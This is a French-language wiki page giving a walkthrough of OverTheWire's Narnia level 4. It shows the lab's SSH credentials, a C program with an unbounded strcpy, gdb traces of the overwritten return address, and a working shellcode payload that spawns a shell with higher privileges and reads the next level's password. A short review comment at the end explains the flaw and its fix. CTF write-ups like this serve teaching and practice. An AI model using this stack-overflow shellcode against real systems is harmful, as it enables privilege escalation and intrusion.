overthewire_narnia:level4 [2017/04/09 15:33] (Version actuelle) |
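--- a/overthewire_narnia:level4
+++ b/overthewire_narnia:level4
+====== Level 4 ======
+
+<code>
+ssh narnia4@narnia.labs.overthewire.org
+pass : thaenohtai
+</code>
+
+<code C>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <ctype.h>
+
+extern char **environ;
+
+int main(int argc,char **argv){
+int i;
+char buffer[256];
+
+for(i = 0; environ[i] != NULL; i++)
+memset(environ[i], '\0', strlen(environ[i]));
+
+if(argc>1)
+strcpy(buffer,argv[1]);
+
+return 0;
+}
+</code>
+
+Buffer stack overflow classique, si vous avez l'habitude d'utiliser les variables d'environnement pour mettre votre shellcode cela ne va pas être possible ici : il est entièrement mis à ''NULL'' ! On va donc mettre directement notre shellcode dans ''buffer'' et sauter dessus :)
+
+<code ASM>
+gdb$ r $(python -c 'print "\xcc"*272+"BBBB"')
+
+Program received signal SIGSEGV, Segmentation fault.
+--------------------------------------------------------------------------[regs]
+EAX: 00000000 EBX: F7FD2FF4 ECX: 00000000 EDX: FFFFD919 o d I t s Z a P c
+ESI: 00000000 EDI: 00000000 EBP: CCCCCCCC ESP: FFFFD620 EIP: 42424242
+CS: 0023 DS: 002B ES: 002B FS: 0000 GS: 0063 SS: 002BError while running hook_stop:
+Cannot access memory at address 0x42424242
+0x42424242 in ?? ()
+gdb$ x/200x $esp
+0xffffd620: 0x00000000 0xffffd6c4 0xffffd6d0 0xf7fdf420
+0xffffd630: 0xffffffff 0xf7ffcff4 0x0804827a 0x00000001
+0xffffd640: 0xffffd680 0xf7fedd61 0xf7ffdad0 0xf7fd72e8
+0xffffd650: 0x00000001 0xf7fd2ff4 0x00000000 0x00000000
+0xffffd660: 0xffffd698 0x5326f6a1 0x7db14eb1 0x00000000
+0xffffd670: 0x00000000 0x00000000 0x00000002 0x080483a0
+0xffffd680: 0x00000000 0xf7ff3f70 0xf7e89d5b 0xf7ffcff4
+0xffffd690: 0x00000002 0x080483a0 0x00000000 0x080483c1
+0xffffd6a0: 0x08048454 0x00000002 0xffffd6c4 0x08048500
+0xffffd6b0: 0x08048560 0xf7feed80 0xffffd6bc 0xf7ffd918
+0xffffd6c0: 0x00000002 0xffffd7f4 0xffffd804 0x00000000
+0xffffd6d0: 0xffffd919 0xffffd929 0xffffd93d 0xffffd95e
+0xffffd6e0: 0xffffd971 0xffffd984 0xffffd991 0xffffde81
+0xffffd6f0: 0xffffde8c 0xffffde98 0xffffdee5 0xffffdefc
+0xffffd700: 0xffffdf0b 0xffffdf17 0xffffdf28 0xffffdf31
+0xffffd710: 0xffffdf44 0xffffdf4c 0xffffdf5c 0xffffdf71
+0xffffd720: 0xffffdfa6 0xffffdfc6 0x00000000 0x00000020
+0xffffd730: 0xf7fdf420 0x00000021 0xf7fdf000 0x00000010
+0xffffd740: 0x17898175 0x00000006 0x00001000 0x00000011
+0xffffd750: 0x00000064 0x00000003 0x08048034 0x00000004
+0xffffd760: 0x00000020 0x00000005 0x00000007 0x00000007
+0xffffd770: 0xf7fe0000 0x00000008 0x00000000 0x00000009
+0xffffd780: 0x080483a0 0x0000000b 0x000036b4 0x0000000c
+0xffffd790: 0x000036b4 0x0000000d 0x000036b4 0x0000000e
+0xffffd7a0: 0x000036b4 0x00000017 0x00000000 0x00000019
+0xffffd7b0: 0xffffd7db 0x0000001f 0xffffdfe8 0x0000000f
+0xffffd7c0: 0xffffd7eb 0x00000000 0x00000000 0x00000000
+0xffffd7d0: 0x00000000 0x00000000 0x08000000 0x5b4ce26c
+0xffffd7e0: 0x85af5645 0x503435d7 0x69632138 0x00363836
+0xffffd7f0: 0x00000000 0x706d742f 0x2f346e2f 0x6e72616e
+0xffffd800: 0x00346169 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd810: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd820: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd830: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd840: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd850: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd860: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd870: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd880: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd890: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd8a0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd8b0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd8c0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd8d0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd8e0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd8f0: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd900: 0xcccccccc 0xcccccccc 0xcccccccc 0xcccccccc
+0xffffd910: 0xcccccccc 0x42424242 0x00000000 0x00000000
+</code>
+
+Nous pouvons donc par exemple sauter à l'adresse ''0xffffd830''.
+
+<code>
+narnia4@melissa:/tmp/n4$ ./narnia4 $(python -c 'print "\x90"*239+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"+"\x30\xd8\xff\xff"')
+bash-4.2$ id
+uid=14004(narnia4) gid=14004(narnia4) euid=14005(narnia5) groups=14005(narnia5),14004(narnia4)
+bash-4.2$ cat /etc/narnia_pass/narnia5
+faimahchiy
+</code>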
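Review bot: The C listing's `strcpy(buffer,argv[1]);` copies an argument of arbitrary length into the fixed 256-byte `buffer` with no length check, and the `memset` loop over `environ` only scrubs the environment strings, it does nothing to bound that copy; this is why the 272-byte input in the gdb run lands in EBP and EIP. The page could state this explicitly after the listing instead of leaving it to be inferred from "Buffer stack overflow classique", since it is the single defect the whole level turns on. The corresponding fix in the program would be a bounded copy, `if(argc>1) snprintf(buffer, sizeof buffer, "%s", argv[1]);`, and the fact that the overwritten return address is reached and the stack-resident payload executes suggests the binary was also built without a stack protector and with an executable stack, which is worth naming for readers as the hardening that would otherwise stop this.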